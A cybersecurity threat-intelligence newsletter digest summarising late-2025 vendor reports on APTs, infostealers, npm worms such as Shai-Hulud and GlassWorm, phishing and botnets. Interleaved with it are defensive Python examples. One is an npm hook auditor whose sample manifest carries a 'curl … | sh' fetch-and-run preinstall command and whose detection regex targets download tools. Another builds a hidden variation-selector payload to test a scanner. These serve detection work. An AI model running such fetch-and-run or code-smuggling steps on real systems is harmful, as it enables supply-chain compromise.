Source: Securelist (Kaspersky)
(Published: 21 November 2025)
Email remains the main means of business correspondence at organizations. Read more.


China’s APT31 linked to hacks on Russian tech firms

Source: The Record
(Published: 21 November 2025)
The China-linked hacking group known as APT31 infiltrated Russia’s technology sector for years and quietly exfiltrated data from companies involved in government contracting and systems integration, according to a new report. Read more.


Brazilian Campaign: Spreading the Malware via WhatsApp

Source: K7 Labs
(Published: 21 November 2025)
K7 Labs learned from a tweet of a massive phishing campaign against Brazil that spreads malware through WhatsApp Web, sending it from the victim’s machine to their contacts with an open-source WhatsApp automation script from GitHub, and that also loads a banking trojan into memory. Read more.


The Korean Leaks – Analyzing the Hybrid Geopolitical Campaign Targeting South Korean Financial Services With Qilin RaaS

Source: Bitdefender
(Published: 24 November 2025)
The “Korean Leaks” campaign showcases a sophisticated supply chain attack against South Korea’s financial sector. Read more.


Weekly DDoSIA Threat Intelligence: Sweden

Source: SOCRadar
(Published: 24 November 2025)
NoName057(16), a pro-Russian hacktivist group, conducted coordinated DDoS attacks on Swedish organizations between November 10 and 16, 2025, as part of its ongoing campaign against countries supporting Ukraine. Read more.


South-east Asia increasingly targeted as cybercrime groups launch global attacks: report

Source: The Business Times
(Published: 25 November 2025)
South-east Asia is increasingly being targeted by cybercriminals leveraging the region’s rapid digitalization and expanding attack surface to launch global campaigns. Read more.


Defending Against Sha1-Hulud: The Second Coming

Source: SentinelOne
(Published: 25 November 2025)
A new wave of compromised NPM packages is leading to wide-scale supply chain attacks. Read more.


Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks

Source: Socket
(Published: 26 November 2025)
The Socket Threat Research Team continues to track North Korea’s Contagious Interview operation as it systematically infiltrates the npm ecosystem. Read more.


Is Zendesk Scattered Lapsus$ Hunters’ Latest Campaign Target?

Source: ReliaQuest
(Published: 26 November 2025)
ReliaQuest has uncovered indications of a potential new campaign from the notorious threat collective “Scattered Lapsus$ Hunters,” this time targeting users of the customer support software Zendesk. Read more.


Xillen Stealer Updates to Version 5 to Evade AI Detection

Source: Darktrace
(Published: 26 November 2025)
Darktrace has observed a new version of the Xillen Stealer malware, designed to exfiltrate sensitive data including credentials, financial information, and cryptowallet keys. Read more.


Deepseek May Intentionally Produce Malicious Code Due to Chinese Political Bias, Research Shows

Source: Foundation for Defense of Democracies (FDD)
(Published: 26 November 2025)
A Chinese AI model may be intentionally generating harmful code due to political biases embedded in its training data, according to new research. Read more.


Albiriox RAT: Mobile Malware Targeting Global Finance and Crypto Wallets

Source: Cleafy Labs
(Published: 26 November 2025)
Cleafy Labs identified a new Android Remote Access Trojan (RAT) dubbed Albiriox, which targets global banking and crypto wallet applications. Read more.


Inside Valkyrie Stealer: Capabilities, Evasion Techniques, and Operator Profile

Source: DExpose
(Published: 26 November 2025)
The DExpose research team analyzed a new info-stealing malware known as Valkyrie, uncovering its core capabilities and operator tradecraft. Read more.


Shai-Hulud 2.0 Exposes Over 33,000 Unique Secrets [Updated Nov, 27]

Source: GitGuardian
(Published: 27 November 2025)
In this report, we detail how the Shai-Hulud 2.0 supply chain attack exposed tens of thousands of unique secrets across hundreds of affected projects. Read more.


TangleCrypt: a sophisticated but buggy malware packer

Source: WithSecure Labs
(Published: 27 November 2025)
Just like most malware packers, TangleCrypt’s main objective is to hide the actual payload and make it look like a benign file. Read more.


Inside Morte Loader: How Loader as a Service Builds Modern Botnets

Source: SOCRadar
(Published: 27 November 2025)
Morte is a Loader as a Service (LaaS) that turns vulnerable SOHO routers, IoT devices and web applications into a flexible botnet platform. Read more.


APT36’s Python-based ELF Malware Targeting Indian Government Entities

Source: Cyfirma
(Published: 27 November 2025)
CYFIRMA researchers observed APT36 deploying a new Python-based ELF malware variant against Indian government agencies. Read more.


Palo Alto Scanning Surges to a 90-Day High

Source: GreyNoise
(Published: 27 November 2025)
GreyNoise observed a dramatic spike in scanning activity targeting Palo Alto Networks devices, reaching the highest level in 90 days. Read more.


FlexibleFerret Malware Continues to Adapt

Source: Jamf
(Published: 27 November 2025)
Jamf Threat Labs is tracking FlexibleFerret, a multi-stage malware family targeting macOS users with evolving techniques. Read more.


Morphisec Thwarts Russian-linked Stealc v2 Campaign Targeting Blender Users via Malicious .blend Files

Source: Morphisec
(Published: 27 November 2025)
Morphisec detected and blocked an attack campaign leveraging weaponized Blender .blend files to distribute Stealc v2, a Russian-linked infostealer. Read more.


The Pain in the Mist: Navigating Operation DreamJob’s Arsenal

Source: Orange Cyberdefense
(Published: 27 November 2025)
Orange Cyberdefense researchers shed light on new tooling, infrastructure and phishing techniques attributed to the North Korea-nexus Operation DreamJob. Read more.


Scattered Lapsus$ Hunters Intensify the Sale of FortiOS Access on DarkForums, with a Focus on Latin America

Source: Devel Group
(Published: 28 November 2025)
On DarkForums, a seller identified as “miyako”, flagged by the community as part of the ecosystem close to Scattered Lapsus$ Hunters, has been steadily publishing compromised access to organizations breached through FortiOS flaws. Read more.


Tomiris wreaks Havoc: New tools and techniques of the APT group

Source: Securelist (Kaspersky)
(Published: 28 November 2025)
While tracking the activities of the Tomiris threat actor, we identified new malicious operations that began in early 2025. Read more.


Thousands of sensitive secrets published on JSONFormatter and CodeBeautify

Source: Security Affairs
(Published: 28 November 2025)
Users of JSONFormatter and CodeBeautify leaked thousands of sensitive secrets, including credentials and private keys, WatchTowr warns. Read more.


Critical Flaw in Oracle Identity Manager Under Exploitation

Source: Dark Reading
(Published: 28 November 2025)
Attackers are exploiting a critical privilege escalation vulnerability in Oracle Identity Manager, prompting urgent patching recommendations. Read more.


Inside ShadyPanda: A 7-Year Malware Campaign That Infected 4 Million Browsers

Source: Koi Labs
(Published: 28 November 2025)
Koi Labs uncovered a massive multi-year surveillance and credential harvesting operation known as ShadyPanda, affecting more than 4 million browser installations worldwide. Read more.


THOR vs. Silver Fox: Uncovering and Defeating a Sophisticated ValleyRAT Campaign

Source: Nextron Systems
(Published: 28 November 2025)
Nextron Systems researchers analyzed a new ValleyRAT campaign attributed to the Silver Fox threat group, uncovering and mitigating the threat with THOR’s YARA rules and behavioral analytics. Read more.


Candiru/DevilsTongue Spyware: Tracking the Global Operations

Source: Recorded Future
(Published: 29 November 2025)
Recorded Future’s Insikt Group analyzed ongoing DevilsTongue spyware activity attributed to the Israeli vendor Candiru. Read more.


DNS Uncovers Infrastructure Used in SSO Attacks

Source: Infoblox
(Published: 1 December 2025)
We recently received a tip from a customer that their institution was under recurring attacks that targeted their student single sign-on (SSO) portal. Read more.


EDR-Freeze: The User-Mode Attack That Puts Security Into a Coma

Source: Picus Security
(Published: 1 December 2025)
EDR-Freeze is a user-mode technique that abuses WerFaultSecure.exe, Windows Error Reporting’s protected-process (PPL) crash handler, to suspend EDR and antivirus processes indefinitely and blind security monitoring without loading a vulnerable driver. Read more.


Google Addresses 107 Android Vulnerabilities, Including Two Zero-Days

Source: CyberScoop
(Published: 1 December 2025)
Google disclosed two actively exploited zero-day vulnerabilities Monday, which it addressed among a total of 107 defects in the company’s monthly security update for Android devices. Read more.


Shai-Hulud 2.0 Aftermath: Ongoing Supply Chain Attack

Source: Wiz
(Published: 1 December 2025)
Wiz researchers are tracking an ongoing supply chain attack involving Shai-Hulud 2.0 that continues to impact organizations through compromised npm packages and cloud workloads. Read more.
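
The Shai-Hulud entries above (Kaspersky, SentinelOne, GitGuardian and Wiz) all come down to the same mechanism: a compromised npm package gets code to run on a developer machine through an install-time lifecycle hook. The script below is an added example, not tooling from any of those vendors, that walks an installed `node_modules` tree and lists every dependency declaring such a hook, rating commands that download or evaluate code as high risk. The sample tree, package names, commands and the risk regex are constructed assumptions of this example.

```python
"""Audit an installed node_modules tree for install-time lifecycle scripts.

Added example, not tooling from Wiz, Kaspersky, SentinelOne or GitGuardian:
a self-propagating npm worm needs a preinstall/postinstall hook to run on the
developer machine, so listing every dependency that declares one is a cheap
first triage step. The sample tree, package names and commands below are
constructed for this example.
"""
import json
import os
import re
import tempfile
from typing import Dict, List, NamedTuple

# Hooks npm runs automatically during `npm install` (prepare also runs for git deps).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Commands that fetch or evaluate code at install time. Heuristic assumption of this example.
HIGH_RISK = re.compile(
    r"\b(curl|wget|powershell|eval)\b"        # download or eval
    r"|\bnode\s+-e\b"                         # inline JavaScript
    r"|\|\s*(sh|bash)\b"                      # pipe-to-shell
)


class HookFinding(NamedTuple):
    package: str
    version: str
    hook: str
    command: str
    risk: str   # "high" or "review"


def classify_command(command: str) -> str:
    """'high' if the script downloads or evaluates code, else 'review'."""
    return "high" if HIGH_RISK.search(command) else "review"


def hooks_in_manifest(manifest: Dict, fallback_name: str) -> List[HookFinding]:
    scripts = manifest.get("scripts") or {}
    name = manifest.get("name", fallback_name)
    version = str(manifest.get("version", "?"))
    return [
        HookFinding(name, version, hook, scripts[hook], classify_command(scripts[hook]))
        for hook in LIFECYCLE_HOOKS
        if hook in scripts
    ]


def audit_node_modules(project_root: str) -> List[HookFinding]:
    """Walk node_modules (including nested and scoped packages) and collect hooks."""
    findings: List[HookFinding] = []
    for dirpath, _dirs, files in os.walk(os.path.join(project_root, "node_modules")):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except ValueError:
                continue   # malformed manifest: skip rather than crash the audit
        findings.extend(hooks_in_manifest(manifest, os.path.basename(dirpath)))
    return sorted(findings)


def build_sample_tree() -> str:
    """Create a constructed node_modules tree in a temp dir and return the project root."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    manifests = {
        "tiny-util": {"name": "tiny-util", "version": "1.0.2",
                      "scripts": {"test": "node test.js"}},
        "native-thing": {"name": "native-thing", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild", "test": "jest"}},
        "@acme/build-helper": {"name": "@acme/build-helper", "version": "0.9.3",
                               "scripts": {"preinstall": "curl -s https://example.invalid/s | sh",
                                           "postinstall": "node install.js"}},
    }
    for rel, manifest in manifests.items():
        pkg_dir = os.path.join(root, "node_modules", *rel.split("/"))
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for f in audit_node_modules(build_sample_tree()):
        print(f"{f.risk:6} {f.package}@{f.version} {f.hook}: {f.command}")
```

Run it against a real project root instead of the sample tree to get the list to review. The complementary control is `ignore-scripts=true` in `.npmrc`, which makes npm refuse every lifecycle script at install time; packages that genuinely need a native build step then show up in this audit as the short list to re-enable deliberately.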


Microsoft Chat With Anyone: Understanding the Phishing Risk

Source: Ontinue
(Published: 1 December 2025)
Attackers are abusing Microsoft’s Chat With Anyone feature to socially engineer victims into credential theft and other phishing attacks. Read more.


Water Saci: Stealthy Banking Malware Leveraging AI and Obfuscation

Source: Trend Micro
(Published: 2 December 2025)
Through AI-driven code analysis and large-scale telemetry, Trend Micro researchers uncovered Water Saci, a stealthy banking malware family that targets financial institutions with sophisticated evasion techniques. Read more.


Insider Threat Detection: Key Warning Signs Your Organization Cannot Ignore

Source: Nisos
(Published: 2 December 2025)
Insider activity rarely appears malicious in the beginning. Read more.


ShadowV2 casts a shadow over IoT devices

Source: Fortinet
(Published: 2 December 2025)
Fortinet researchers are tracking ShadowV2, an IoT-focused malware that expands on the capabilities of its predecessor with stealthier persistence mechanisms. Read more.



Security Signals (11/04/25-11/18/25)

This Edition’s Articles

The latest November 2025 cyber threat reports reveal a surge in high-impact activity across the global threat landscape, from major ransomware developments like LockBit 5.0 and VanHelsing to new espionage operations linked to Lazarus, APT42, and multiple Iran-aligned groups. This roundup also covers expanding phishing campaigns, advanced Android and Windows malware families, supply-chain intrusions, and the growing use of AI tools in both attack and defense.

Dissecting the Infection Chain: Technical Analysis of the Kimsuky JavaScript Dropper

Source: Pulsedive Threat Research
(Published: 5 November 2025)
This blog analyzes a Kimsuky JavaScript dropper sample, detailing how it retrieves additional stages and the network traffic observed across the full infection chain. Read more.


Update on Attacks by Threat Group APT-C-60

Source: JPCERT/CC Eyes
(Published: 5 November 2025)
JPCERT/CC provides an update on recent attacks linked to APT-C-60, summarizing new intrusion methods, infrastructure, and targeting patterns observed in Japan and abroad. Read more.


Herodotus: a banking trojan that exposes the limits of an antivirus

Source: Pradeo
(Published: 6 November 2025)
Pradeo describes Herodotus, a new Android banking trojan offered as Malware as a Service that masquerades as a legitimate app, gains sensitive permissions, and performs fraudulent banking operations on behalf of victims. Read more.


Phishing Campaigns “I Paid Twice” Targeting Booking.com Hotels and Customers

Source: Sekoia.io
(Published: 6 November 2025)
Sekoia.io analysts detail a phishing campaign abusing compromised Booking.com accounts and messaging apps to trick hotel staff and guests, ultimately delivering malware and running banking fraud schemes. Read more.


Slot Gacor: The Rise of Online Casino Spam

Source: Sucuri Security
(Published: 7 November 2025)
Sucuri explains how online casino spam has become one of the most prevalent SEO spam threats, with attackers hacking websites to inject hidden backlinks that promote gambling portals. Read more.


Threat actor usage of AI tools

Source: Google Threat Intelligence Group
(Published: 7 November 2025)
Google Threat Intelligence Group examines how threat actors are adopting AI tools across the attack lifecycle, from crafting phishing content to supporting malware development and operational workflows. Read more.


Distribution of Backdoor Malware with Legitimate Signature, Disguised as Steam Cleanup Tool

Source: AhnLab ASEC
(Published: 10 November 2025)
ASEC reports multiple cases of malware posing as the SteamCleaner utility, installing a malicious Node.js script that periodically contacts C2 servers to execute commands on infected systems. Read more.


New Phishing Campaign Exploits Meta Business Suite to Target SMBs Across the U.S. and Beyond

Source: Check Point Software
(Published: 10 November 2025)
Check Point Harmony Email Security researchers uncover a large-scale phishing campaign abusing Meta Business Suite and facebookmail.com to send convincing notifications that steal credentials from small and mid-sized businesses. Read more.


Analysis of Encryption Structure of Yurei Ransomware Go-based Builder

Source: AhnLab ASEC
(Published: 11 November 2025)
ASEC analyzes the Go-based Yurei ransomware builder, detailing its ChaCha20-Poly1305 file encryption, ECIES key protection, and targeting of organizations across several industries in Sri Lanka and Nigeria. Read more.


Amazon discovers APT exploiting Cisco and Citrix zero-days

Source: AWS Security Blog
(Published: 12 November 2025)
Amazon threat intelligence teams describe an advanced actor exploiting zero-day vulnerabilities in Cisco Identity Services Engine and Citrix systems, deploying custom web shells and targeting critical identity infrastructure. Read more.


Contagious Interview Actors Now Utilize JSON Storage Services for Malware Delivery

Source: NVISO Labs
(Published: 13 November 2025)
NVISO reports that the Contagious Interview campaign now abuses legitimate JSON storage services to host obfuscated payloads delivered through trojanized code projects used in fake job interviews. Read more.


Arsenal Analysis of a Nation-State Actor: An In-Depth Look at Lazarus ScoringMathTea

Source: 0x0d4y Malware Research
(Published: 13 November 2025)
This post builds on prior ESET research into Operation Dream Magic to analyze the Lazarus ScoringMathTea toolset, focusing on its capabilities, infrastructure, and links to earlier campaigns. Read more.


Curly COMrades: Evasion and Persistence via Hidden Hyper-V Virtual Machines

Source: Bitdefender
(Published: 4 November 2025)
Bitdefender’s investigation revealed that the attackers relied on a combination of custom malware and stealth techniques, including hidden Hyper-V virtual machines, to establish and maintain persistence within the victim environment. Read more.


Cloudflare Scrubs Aisuru Botnet from Top Domains List

Source: KrebsOnSecurity
(Published: 5 November 2025)
For the past week, domains associated with the massive Aisuru botnet have repeatedly usurped Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites. Read more.


New Kimsuky Malware ‘EndClient RAT’: First Technical Report and IOCs

Source: 0x0v1
(Published: 5 November 2025)
After installing the banking software and displaying a decoy VBS script, the MSI bundle creates a BAT script that copies the AutoIt3.exe binary together with a heavily obfuscated Au3 script. Read more.


LockBit 5.0 Analysis: Technical Deep Dive into the RaaS Giant’s Latest Upgrade

Source: Flashpoint
(Published: 6 November 2025)
LockBit 5.0, introduced in late September 2025, is the latest evolution of this dominant ransomware-as-a-service group, bringing new anti-analysis features and more flexible encryption options. Read more.


MUT-4831: Trojanized npm packages deliver Vidar infostealer malware

Source: Datadog Security Labs
(Published: 6 November 2025)
In two bursts, on October 21-22 and October 26, the researchers observed 23 releases of 17 distinct npm packages carrying the Vidar infostealer payload or related indicators. Read more.


Critical Cisco UCCX flaw lets hackers run commands as root

Source: BleepingComputer
(Published: 6 November 2025)
A critical security flaw in Cisco’s Unified Contact Center Express platform allows attackers to run commands as root on vulnerable systems. Read more.


LANDFALL: New Commercial-Grade Android Spyware in Exploit Chain Targeting Samsung Devices

Source: Unit 42 by Palo Alto Networks
(Published: 7 November 2025)
Unit 42 researchers have identified a new commercial-grade Android spyware family dubbed LANDFALL that is delivered through an exploit chain targeting Samsung devices. Read more.


DarkComet Spyware Resurfaces Disguised as Fake Bitcoin Wallet

Source: HackRead
(Published: 12 November 2025)
Old DarkComet RAT spyware is back, hiding inside fake Bitcoin wallets and trading apps to steal credentials via keylogging. Read more.


Malicious Chrome Extension Exfiltrates Seed Phrases, Enabling Crypto Theft

Source: Socket
(Published: 12 November 2025)
A malicious Chrome extension posing as an Ethereum wallet steals seed phrases by encoding them into Sui transactions, enabling full wallet takeover. Read more.


The COM: Anatomy of an English-Speaking Cybercriminal Ecosystem and the Origins of Scattered Lapsus Hunters

Source: CloudSEK
(Published: 12 November 2025)
Over the past decade, the English-speaking cybercriminal ecosystem commonly referred to as “The COM” has undergone a profound transformation. Read more.


Critical FortiWeb flaw under attack, allowing complete compromise

Source: Security Affairs
(Published: 14 November 2025)
A Fortinet FortiWeb auth-bypass flaw is being actively exploited, allowing attackers to hijack admin accounts and fully compromise devices. Read more.


Iranian Hackers Launch ‘SpearSpecter’ Spy Operation on Defense and Government Targets

Source: The Hacker News
(Published: 14 November 2025)
The Iranian state-sponsored threat actor known as APT42 has been observed targeting government and defense organizations with a new espionage campaign codenamed SpearSpecter. Read more.


DDoSia Targets Denmark: A Clear Look at the Threat

Source: SOCRadar
(Published: 17 November 2025)
Between November 4 and November 13, 2025, Denmark was included in a focused campaign by pro-Russian hacktivist groups. Read more.


IndonesianFoods Spam Campaign: What Security Teams Need To Know

Source: SOCRadar
(Published: 17 November 2025)
A large-scale campaign known as IndonesianFoods has recently gained attention for its unusual impact on the npm ecosystem. Read more.


Tracking a Dragon: Investigating a DragonForce-affiliated ransomware attack with Darktrace

Source: Darktrace
(Published: 5 November 2025)
Darktrace investigates a DragonForce-affiliated ransomware attack targeting the manufacturing sector, tracing the intrusion from initial access through to ransomware deployment. Read more.


Gootloader Threat Detection: WOFF2 Obfuscation and Evasion Tactics

Source: Huntress
(Published: 5 November 2025)
Gootloader is a sophisticated JavaScript-based malware loader that threat actors commonly use to gain initial access. Read more.


GlassWorm Returns: New Wave Strikes as We Expose Attacker Infrastructure

Source: Koi Security
(Published: 6 November 2025)
Almost three weeks ago, we disclosed GlassWorm, the first self-propagating worm targeting VS Code extensions using invisible Unicode characters, and now we are seeing a new wave of infections linked to the same attacker infrastructure. Read more.
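
The GlassWorm entry above turns on one property: characters that render as nothing in an editor still survive in an extension's source and still reach whatever reads the file. The script below is an added example, not code from Koi Security or the GlassWorm write-up. It scans text for the Unicode classes that can hide or reorder content (zero-width and other format controls, Hangul fillers, tag characters, bidi overrides, variation selectors) and also decodes bytes smuggled as variation selectors. The sample extension text and the hidden payload are constructed; the byte-to-variation-selector mapping is the common smuggling convention and is an assumption of this example, not a mapping the page states GlassWorm used.

```python
"""Scan source text for invisible Unicode and decode variation-selector-smuggled bytes.

Added example, not code from Koi Security or the GlassWorm write-up. The sample
extension text and the hidden payload are constructed; the byte-to-variation-
selector mapping is the common smuggling convention and an assumption here.
"""
import unicodedata
from collections import Counter
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    line: int       # 1-based
    column: int     # 1-based, counted in code points
    codepoint: int
    reason: str


def classify(ch: str) -> str:
    """Reason string if the character is invisible or direction-altering, else ''."""
    cp = ord(ch)
    if 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF:
        return "variation selector"
    if cp in (0x115F, 0x1160, 0x3164, 0xFFA0):
        return "hangul filler"            # letters by category, blank on screen
    if 0xE0000 <= cp <= 0xE007F:
        return "tag character"
    if 0x202A <= cp <= 0x202E or 0x2066 <= cp <= 0x2069:
        return "bidi control"             # can reorder what the reviewer sees
    if unicodedata.category(ch) == "Cf":
        return "format control"           # zero-width space/joiner, soft hyphen, BOM, ...
    return ""


def scan_source(text: str) -> List[Finding]:
    """Walk every code point of every line and report the invisible ones."""
    findings = []
    for line_no, line in enumerate(text.split("\n"), start=1):
        for col, ch in enumerate(line, start=1):
            reason = classify(ch)
            if reason:
                findings.append(Finding(line_no, col, ord(ch), reason))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    return dict(Counter(f.reason for f in findings))


def encode_variation_selectors(data: bytes) -> str:
    """Bytes 0-15 -> U+FE00..U+FE0F, 16-255 -> U+E0100..U+E01EF (assumed convention)."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def decode_variation_selectors(text: str) -> bytes:
    """Inverse mapping: pull the smuggled bytes back out of any text."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


# Constructed sample: looks like a harmless extension entry point in an editor.
HIDDEN_PAYLOAD = encode_variation_selectors(b"eval(fetch)")
SAMPLE_EXTENSION_JS = (
    'const vscode = require("vscode");\n'
    'function activate(ctx) {\u200b\u200b\n'              # two zero-width spaces
    '  const tag = "\u3164\u3164";\n'                      # Hangul fillers inside a string
    '  const x = "\U0001F44D' + HIDDEN_PAYLOAD + '";\n'    # emoji, then smuggled bytes
    '}\n'
)


if __name__ == "__main__":
    for f in scan_source(SAMPLE_EXTENSION_JS):
        print(f"line {f.line} col {f.column}: U+{f.codepoint:04X} {f.reason}")
    print("recovered:", decode_variation_selectors(SAMPLE_EXTENSION_JS))
```

Point `scan_source` at the unpacked `.vsix` contents (every `.js`, `.json` and `.md` file) as a pre-install or CI gate. The one common legitimate hit is a zero-width joiner or variation selector inside an emoji sequence in a string literal, so review findings by context rather than suppressing those classes outright.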


Lazarus Group targets Aerospace and Defense with new Comebacker variant

Source: Enki
(Published: 7 November 2025)
Enki researchers detail a new Comebacker malware variant deployed by the Lazarus Group against aerospace and defense organizations, expanding the threat actor’s long-running espionage toolkit. Read more.


Maverick and Coyote: Analyzing the link between two evolving Brazilian banking trojans

Source: CyberProof
(Published: 10 November 2025)
The CyberProof SOC Team has observed overlapping infrastructure and tooling connecting the Brazilian banking trojans Maverick and Coyote, suggesting a shared developer or tightly coordinated operators. Read more.


Dissecting ValleyRAT: From loader to RAT execution in targeted campaigns

Source: Picus Security
(Published: 11 November 2025)
Picus researchers analyze ValleyRAT’s loader, staging chain, and command-and-control behavior observed in recent targeted attacks against organizations in East Asia. Read more.


Initial Access Brokers (IAB) in 2025: From dark web listings to supply chain ransomware events

Source: Darknet.org.uk
(Published: 12 November 2025)
Initial Access Brokers are specialist cybercriminals who sell or rent compromised footholds in corporate networks, enabling ransomware gangs and other actors to launch disruptive attacks with minimal effort. Read more.


Thousands of domains target hotel guests in massive phishing campaign

Source: Netcraft
(Published: 12 November 2025)
Netcraft has identified thousands of lookalike domains impersonating hotel brands and booking platforms to lure guests into phishing pages that steal credentials and payment information. Read more.


DigitStealer: a JXA-based infostealer that leaves little footprint

Source: Jamf
(Published: 13 November 2025)
Jamf Threat Labs dissects the new DigitStealer malware, a sophisticated macOS infostealer that uses advanced hardware checks and multi-stage attacks to evade detection and steal sensitive data. Read more.


Uncovering a Multi-Stage Phishing Kit Targeting Italy’s Infrastructure

Source: Group-IB
(Published: 13 November 2025)
Group-IB researchers uncovered a professional phishing framework that mimics trusted brands with remarkable precision, using layered evasion, CAPTCHA filtering, and Telegram-based data exfiltration to harvest credentials and bypass automated detection. Read more.


Unmasking Vo1d: Inside Darktrace’s botnet detection

Source: Darktrace
(Published: 14 November 2025)
Earlier this year, Darktrace investigated the Vo1d malware campaign, tracing its activity from DGA-based DNS beaconing to major cloud infrastructure and ultimately to its C2 server communications. Read more.
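
The Vo1d entry above starts from DGA-based DNS beaconing, which is a pattern defenders can score without knowing the algorithm: one host cycling through long, high-entropy names that mostly fail to resolve, with the one that does resolve being the live C2. The script below is an added example, not Darktrace's detection logic and not Vo1d's real domain generation algorithm (the page does not describe it). The log format, thresholds and sample lines are constructed assumptions of this example.

```python
"""Flag DGA-style DNS beaconing in query logs.

Added example, not Darktrace's detection logic and not Vo1d's real domain
generation algorithm. The log format, the thresholds and the sample lines are
constructed for this example.
"""
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Optional

# Constructed format: "<timestamp> <client_ip> <qtype> <qname> <rcode>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


class Query(NamedTuple):
    ts: str
    client: str
    qtype: str
    qname: str
    rcode: str


class ClientVerdict(NamedTuple):
    client: str
    generated_labels: List[str]   # distinct DGA-looking registrable labels
    nxdomain: int                 # how many of those never resolved
    suspicious: bool


def parse_line(line: str) -> Optional[Query]:
    m = LOG_RE.match(line.strip())
    return Query(*m.groups()) if m else None


def registrable_label(qname: str) -> str:
    """Second-level label: 'a7f3kq9zx2' for 'cdn.a7f3kq9zx2.com.'.
    Assumes a single-label public suffix; use a PSL library for .co.uk-style suffixes."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_generated(label: str, min_len: int = 8, min_entropy: float = 3.0,
                    max_vowel_ratio: float = 0.25) -> bool:
    """Long, high-entropy, vowel-poor labels. Thresholds are assumptions; tune on your traffic."""
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in "aeiou" for c in letters) / len(letters) if letters else 0.0
    return (len(label) >= min_len
            and shannon_entropy(label) >= min_entropy
            and vowel_ratio <= max_vowel_ratio)


def detect_dga_beaconing(lines: List[str], min_labels: int = 3,
                         min_nxdomain: int = 2) -> List[ClientVerdict]:
    """A host cycling through several generated names, most of them NXDOMAIN,
    is the classic DGA fingerprint: the one that resolves is the live C2."""
    per_client: Dict[str, Dict[str, bool]] = defaultdict(dict)
    for line in lines:
        q = parse_line(line)
        if q is None or q.qtype not in ("A", "AAAA"):
            continue
        label = registrable_label(q.qname)
        if not looks_generated(label):
            continue
        seen = per_client[q.client]
        seen[label] = seen.get(label, False) or q.rcode == "NXDOMAIN"
    verdicts = []
    for client, labels in sorted(per_client.items()):
        nx = sum(labels.values())
        verdicts.append(ClientVerdict(client, sorted(labels), nx,
                                      len(labels) >= min_labels and nx >= min_nxdomain))
    return verdicts


# Constructed sample log: 10.0.0.5 behaves like a DGA-infected host.
SAMPLE_DNS_LOG = """
2025-11-14T09:00:01Z 10.0.0.5 A x9q3vlz8pk.com NXDOMAIN
2025-11-14T09:00:02Z 10.0.0.5 A zq7m2kt4wp.net NXDOMAIN
2025-11-14T09:00:03Z 10.0.0.5 A k3bq9zx7lm.org NXDOMAIN
2025-11-14T09:00:04Z 10.0.0.5 A a7f3kq9zx2.com NOERROR
2025-11-14T09:00:05Z 10.0.0.5 A www.google.com NOERROR
2025-11-14T09:00:06Z 10.0.0.7 A update.microsoft.com NOERROR
2025-11-14T09:00:07Z 10.0.0.7 A cdn.cloudflare.net NOERROR
2025-11-14T09:00:08Z 10.0.0.7 A win10update.com NOERROR
2025-11-14T09:00:09Z 10.0.0.9 A p8vzk2qw3r.com NXDOMAIN
""".strip().splitlines()


if __name__ == "__main__":
    for v in detect_dga_beaconing(SAMPLE_DNS_LOG):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{v.client}: {len(v.generated_labels)} generated labels, "
              f"{v.nxdomain} NXDOMAIN -> {flag}")
```

The per-host aggregation is what keeps this usable: a single odd-looking label (10.0.0.9 above) stays below the bar, while the cluster of NXDOMAIN lookups followed by one NOERROR answer on 10.0.0.5 is the pivot point, and the resolving name is the domain to enrich and block first.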


Pig Butchering Scams: Cybercrime Threat Intelligence

Source: Cyfirma
(Published: 15 November 2025)
Pig butchering scams, also known as romance or cryptocurrency investment scams, are long-term social engineering schemes in which attackers build trust before defrauding victims of large sums of money. Read more.


RONINGLOADER: DragonBreath’s new path to PPL abuse

Source: Elastic Security Labs
(Published: 15 November 2025)
This campaign primarily targets Chinese-speaking users and demonstrates a clear evolution in adaptability compared to earlier DragonBreath-related campaigns documented in 2022-2023. Read more.


100,000 WordPress Sites Affected by Privilege Escalation Vulnerability in AI Engine WordPress Plugin

Source: Wordfence
(Published: 4 November 2025)
On October 4th, 2025, we received a submission for a Sensitive Information Exposure vulnerability in AI Engine, a WordPress plugin with more than 100,000 active installations. Read more.


Crossed wires: a case study of Iranian espionage and attribution

Source: Proofpoint
(Published: 5 November 2025)
This analysis examines a newly identified threat actor dubbed UNK_SmudgedSerpent that targeted academics and foreign policy experts between June and August 2025. Read more.


Private data at risk due to seven ChatGPT vulnerabilities

Source: Tenable
(Published: 5 November 2025)
Tenable Research has identified seven vulnerabilities in ChatGPT that could enable an attacker to exfiltrate private information from users’ memories and chat history. Read more.


UNC6384’s 2025 PlugX Campaign Explained

Source: Picus Security
(Published: 6 November 2025)
In March 2025, UNC6384 ran a targeted espionage campaign against diplomatic and related organizations, employing a multi-stage, highly evasive delivery chain that culminated in the in-memory deployment of the SOGU.SEC/PlugX backdoor. Read more.


Fantasy Hub: Another Russian Based RAT as M-a-a-S

Source: Zimperium
(Published: 6 November 2025)
